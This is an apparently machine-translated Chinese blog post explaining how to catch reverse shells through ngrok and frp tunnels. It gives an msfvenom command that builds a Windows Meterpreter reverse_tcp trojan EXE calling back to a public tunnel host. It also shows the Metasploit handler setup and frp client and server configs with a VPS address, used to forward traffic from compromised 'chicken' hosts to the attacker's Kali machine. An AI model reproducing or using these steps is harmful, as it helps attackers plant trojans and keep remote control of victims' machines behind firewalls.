当前位置:网站首页>Kali intranet penetration shell
Kali intranet penetration shell
2022-06-09 16:30:00 【amingMM】
Intranet penetration article
adopt ngrok Penetrating rebound shell
0.0 register ngrok Intranet penetration platform account , Open a free Tunnel
website :https://www.ngrok.cc

eg: 192.168.254.128 My intranet ip




0x01 Download install penetration client client
Address :https://www.ngrok.cc/sunny/linux_amd64.zip?v=2.1

unzip
./sunny clientid Tunnel id


0x02 Msfvenom wood & Ma Geng
kali command Generate EXE Trojan files :
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tcp://free.idcfengye.com LPORT=10206 -f exe -o /home/amingmm/Desktop/puty.exe

0x03 start-up msf To configure Exploit modular
Use exploit/multi/handler
0x04 Select attack payload to go online
set payload windows/meterpreter/reverse_tcp

set
run/exploit

Frp Will the network meterpreter Forward to local msf
https://github.com/fatedier/frp/releases【 download 】
decompression
● kali End frpc To configure
[common]
server_addr = 121.5.64.200 #vps Address
server_port = 2580 #vps Listening port
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 12580 # msf load Listening port 【 That is, the listening port of the intranet host 】
remote_port = 6666 # vps Traffic forwarding port 【 Flow outlet Load port 】
Server side
[common]
bind_port = 2580 【 Server listening port 】
./frps(frpc) -c frps.ini (frpc.ini) Open server ( client )
systemctl start frps
systemctl restart frps
systemctl stop frps
● frp Connection process
frps Open two ports to listen ----< Intranet client frpc Turn on tcp Connect to vps
vps– The intranet host establishes a connection Connect 1 establish
● Chicken on line technological process
Load creation process Active connection vps: Load port
Pipeline flow forwarding hold Load port Traffic adopt tcp Connect Contract awarding Transferred to the Intranet kali End
● kali End Online process
kali End frpc client Through pipes Will flow Forward to msf handler --> Listening port


边栏推荐
- 重构要点学习
- 国泰君安开户安全吗
- 开始使用 Dapr
- [ctfshow 单身杯]web writeup&&学习一下sed awk基本用法
- Dotnet core releases only necessary dependent files
- What if win10 cannot find the flight mode switch?
- 从 0 到 1,探究百亿流量验证下的 MVVM 框架设计
- 面试官问我一条update语句加了多少锁?我总结了全套八股文
- After reading it, I will analyze the whole process from packet capturing to interface testing
- Dapr . Net core example
猜你喜欢

Analysis of folder Writeability during SAP commerce cloud construction

疫情之下,四点认知助你成长!

Customizing the in app keyboard in fluent

应用软件效率测试的执行策略

测试必看,初次编写测试用例的要点

Interface test series -- practical application of autodiff traffic playback in integration test

在Flutter中自定义应用程序内键盘

Experience sharing of technical we media realization -- starting to try to make CSDN's reply one year later

在不平衡数据上使用AUPRC替代ROC-AUC

姑娘,你为什么要编程呢
随机推荐
Consul learning
618's money saving technology strategy is coming - experience the scene and get a 10 yuan cat super card!
Consul学习
记一次可怜的150元RCE平安Src挖掘
leetcode:240.搜索二维矩阵 II
C语言去掉字符串末尾的空白字符
基于 abp vNext 的快速开发模板
网页加载waiting(TTFB)时间过长的解决方案参考
疫情之下,四点认知助你成长!
30-year-old mind map
怎么替换或禁用 WordPress 前后台默认的蓝色 favicon.ico 图标
Install MySQL 5.7 server under windows (full of holes)
DAC8560的用法
[SEETF]Super Secure Requests Forwarder
Google搜索为什么不能无限分页?
还在从零开始搭建项目?这款升级版快速开发脚手架值得一试~
June training (day 08) - prefix and
Build an integrated intelligent dialogue analysis platform from intelligent quality inspection to dialogue analysis, and the customer service center of Bank of Hangzhou creates a new business card of
Phalapi framework improvement scheme: manage multiple API applications on a set of phalapi system
现金类的理财产品是保本的吗?